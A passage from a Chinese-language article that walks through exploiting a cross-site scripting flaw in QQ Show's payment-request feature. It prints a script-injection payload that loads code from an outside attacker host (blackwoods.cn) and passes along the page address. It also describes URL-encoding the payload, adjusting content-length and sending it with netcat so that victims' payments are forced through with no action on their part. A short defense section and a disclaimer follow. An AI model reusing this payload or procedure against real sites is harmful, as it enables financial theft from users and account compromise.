http%3a%2f%2fqqshow.qq.com%2fmall%2finc%2freq01.html%3fitemno%3d17698%

26nowprice%3d40%26itemname%3d%bb%a8%bc%be%d3%ea%bc%be%26vipprice%

3d&itemtype=show.qq.com%2fmall%2finc%2freq01.html%3fitemno%3d17698%26now

price%3d40%26itemname%3d%bb%a8%bc%be%d3%ea%bc%be%26vipprice%3d27&

recvuin=15300898&message=hanguofeng&x=10&y=13
[/code]
请注意上面标为黑体的hanguofeng，这个就是我们填写的给被请求者的留言，我们来构造自己的代码：
[code]
<script>document.write("<script src=’http:// blackwoods.cn/0.asp?"+window.top.location+"’><\/script>")</script><script>y()</script>
[/code]
这里我们用js写一个包含外部脚本的代码，并将页面地址作为一个参数传递给我们的生成外部js的asp页面0.asp，然后我们执行函数y()。
当然，作为合法的http请求，我们还需要将这些代码进行url编码。
然后将这段代码替换掉hanguofeng,并算出请求的长度，更改前面的content-length: 384中384的值。然后用网络军刀netcat来发包，发完包对方的qq就会弹出消息，当被请求人打开的时候，如果他的账户余额够，那么我们的支付请求就已经强行通过了，不需要被请求人作任何动作。

防守方法

对于这个漏洞来说，防守方法分为网站和用户两个方面，对于网站来说，应该尽力消除跨站隐患，并且对用户信息进行更好的保护。
那么对于用户来说呢，我们显得比较被动，在网站没有解决跨站的问题前，就不要打开不熟悉好友的要求支付的请求了。

总结

本文不是教您如何进行攻击，而是以qq秀的漏洞为例，来讲跨站攻击的危害，希望大家不要用这个方法来进行盗取别人qq号的行为。
许多脚本安全界的朋友认为跨站漏洞是一类鸡肋漏洞，没有什么好利用的地方，玄猫认为，如果您能把思路更打开，不只局限在了盗取cookies方面，诚然，跨站式漏洞可能不如注入或者溢出能够直接得到较高的操作权限，但是跨站式攻击结合别的攻击手段可以取得非常好的效果，以后玄猫还会给大家介绍更多的跨站攻击的利用思路和实例。
网络安全是一个整体，成语说”千里之堤，溃于蚁穴”，正式这个道理，希望国内的门户网站都能注意自己站点上的各种漏洞，更好的保护用户资料的安全。
附:tips

什么是跨站式攻击?
按照本质来说，跨站攻击就是攻击者利用程序对用户输入过滤不足，写入可以显示在页面上对其他用户造成影响的代码。还用qq这个跨站点的例子来说，我们在支付留言中填写代码：
[code]
<script>alert(“玄猫”)</script>
[/code]
就可以在用户浏览这个支付请求时，在其浏览器上弹出一个内容为“玄猫”的对话框。
[图三]